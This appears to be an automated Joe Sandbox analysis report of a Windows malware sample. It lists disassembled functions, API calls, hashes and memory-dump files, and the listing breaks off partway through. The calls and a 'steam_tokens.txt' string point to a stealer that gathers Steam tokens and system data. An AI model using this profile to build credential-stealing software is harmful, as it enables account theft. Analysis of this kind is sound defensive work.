                                • Instruction ID: fc5cb5bef68f95c380c08e27fc90d336ad92267a68126353e7eb63e7feed1b1b
                                • Opcode Fuzzy Hash: 4a173fe232d286c5d278b425c1110b5159a348dc13500cf645bd694310dd0b69
                                • Instruction Fuzzy Hash: 3941A532A01609ABDF23EF69DC85BEF77B4AF54304F0544A9E915AB262DB30ED05C790
                                Function 003AE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 003AEA61
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AEA7A
                                • lstrcat.KERNEL32(?,00F78B28), ref: 003AEA8D
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AEA9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 360624915c383fe42aef04b9857074acf1d9c75cae1dc9ee398cfd52287f54f1
                                • Instruction ID: 87da215793c507b08a9f704b2dd89bfeffa2278f7cff1920d9c2885a1b47b5ee
                                • Opcode Fuzzy Hash: 360624915c383fe42aef04b9857074acf1d9c75cae1dc9ee398cfd52287f54f1
                                • Instruction Fuzzy Hash: 5E41A772910519AFCB16EB64DC46FFE7378FF58300F0144A8FA169B241DE709E889B94
                                Function 003AECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AECDF
                                • lstrlen.KERNEL32(00000000), ref: 003AECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AED1D
                                • lstrlen.KERNEL32(00000000), ref: 003AED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003AED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 2c88566226158a631e648d7a4b17ee6c5d7a7613d3689c87de0053b216138222
                                • Instruction ID: 9a3e0f93ff94c284dd7cad4c0d1f18228301f7d94ceacf19d6554d0e2df10183
                                • Opcode Fuzzy Hash: 2c88566226158a631e648d7a4b17ee6c5d7a7613d3689c87de0053b216138222
                                • Instruction Fuzzy Hash: B4316F32A129156FCB23BB78EC4AAAF77A8AF51700F055164F846DF212DF20DC2687D5
                                Function 00399A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0039140E), ref: 00399A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0039140E), ref: 00399AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,0039140E), ref: 00399AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,0039140E,00000000,?,?,?,0039140E), ref: 00399AE0
                                • LocalFree.KERNEL32(?,?,?,?,0039140E), ref: 00399B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,0039140E), ref: 00399B07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 46397357f3ed8938189f1a88ca5ec066105567792eb396dd2d060fb126e576e5
                                • Instruction ID: 0227f8edfab55bd8bac1d4df8ce1ce7544827540abfd4eebed7c8f50b97e74e7
                                • Opcode Fuzzy Hash: 46397357f3ed8938189f1a88ca5ec066105567792eb396dd2d060fb126e576e5
                                • Instruction Fuzzy Hash: 8B115B71600609EFEB12DFA9DC88FBB736CEB14340F11025EF901A6280EB749D04CBA0
                                Function 003B5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5B14
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 003B5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 003B5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 003B5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                                • Instruction ID: 67e586fdf35cd26a7c587f7ac8fc237173023bf4c5424e11984b0c6894d14b8f
                                • Opcode Fuzzy Hash: 44a46d45c6412e6cedd0d318a0604678d0dbf2882390b301ee037a67deffaf7a
                                • Instruction Fuzzy Hash: 75417171B005199FCF09DF6CC891BAEBBB5EB88314F158229E909EB744D630DD008B90
                                Function 003A7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1D5
                                  • Part of subcall function 003BA1C0: std::exception::exception.LIBCMT ref: 003BA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 5627c6d97a07d1e2aadbbc0d939aba231830bc41cc0bbfe62a43415f1d6a3b5b
                                • Instruction ID: 9f7b1d717b1185e95f2a73138e9edde4fa0b2e5aed140dddf8ad72395edc62a1
                                • Opcode Fuzzy Hash: 5627c6d97a07d1e2aadbbc0d939aba231830bc41cc0bbfe62a43415f1d6a3b5b
                                • Instruction Fuzzy Hash: 6421E4323186009BD722DE2CDCD1A7AF7E9EFA2754B204A2EE492CB641D770DC0087A1
                                Function 003B33C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 003B3411
                                • wsprintfA.USER32 ref: 003B3437
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                                • Instruction ID: a1dde2ee00bb38d689896e56f4e8e795de4db50d718193a451fffbf9ec68fdaa
                                • Opcode Fuzzy Hash: 85bd98ef3f2507ada800de031f96f16872b98bf028df4b2b5b48257f01bb373e
                                • Instruction Fuzzy Hash: 2701B5B1E44614AFDB05DF98DC49FAEB7B8FB44714F000529FA06E7780DB74590086A5
                                Function 003AD7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00F7E5D8,00000000,00020119,?), ref: 003AD7F5
                                • RegQueryValueExA.ADVAPI32(?,00F7F448,00000000,00000000,00000000,000000FF), ref: 003AD819
                                • RegCloseKey.ADVAPI32(?), ref: 003AD823
                                • lstrcat.KERNEL32(?,00000000), ref: 003AD848
                                • lstrcat.KERNEL32(?,00F7F478), ref: 003AD85C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                                • Instruction ID: 93812d1fe6561a3342f5484b36c7f73425ab0324c0c4cc07d4f47cebd2e93e8f
                                • Opcode Fuzzy Hash: f5a74417368c6130bcb5088123d4032e91e655c62b791c69522bddf576b06dac
                                • Instruction Fuzzy Hash: 26413075A1050DAFCB55EF64EC86FEE77B8EB54304F004064B50A9B251EE34AA898F91
                                Function 003A7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A7F60
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FA5
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A7FD3
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8007
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d2d0c13267e88c2ff25d30f624677063886b95eec0ed59ab7190fb5f38a344f2
                                • Instruction ID: df767bf35ae0821506c0d1cec216e7f8486e63608d1599d1a491a8b68f585c89
                                • Opcode Fuzzy Hash: d2d0c13267e88c2ff25d30f624677063886b95eec0ed59ab7190fb5f38a344f2
                                • Instruction Fuzzy Hash: 9C41803060411AEFCB22DF68D8C4EAEB7B8FF55300F124599E805DB351EB74AA65CB91
                                Function 003A8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A80EA
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A8102
                                • lstrlen.KERNEL32(00000000), ref: 003A8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A816F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 47a40c51bb0ee2ff8df90ce46a28669fe2ea12e7ac0b6c173f5a41f34e980b09
                                • Instruction ID: 74276d05ab93b536494d374efa8f3ec8cf1642bd1a8d080f1b7855371b280232
                                • Opcode Fuzzy Hash: 47a40c51bb0ee2ff8df90ce46a28669fe2ea12e7ac0b6c173f5a41f34e980b09
                                • Instruction Fuzzy Hash: 6E419E71A00206AFCB22DF78D948BAABBF4EF45700F11845CA845D7204EF34DD46CB90
                                Function 003B3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00F6BAA8,00000000,00020119,?), ref: 003B318C
                                • RegQueryValueExA.ADVAPI32(?,00F7E558,00000000,00000000,00000000,000000FF), ref: 003B31A7
                                • RegCloseKey.ADVAPI32(?), ref: 003B31B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
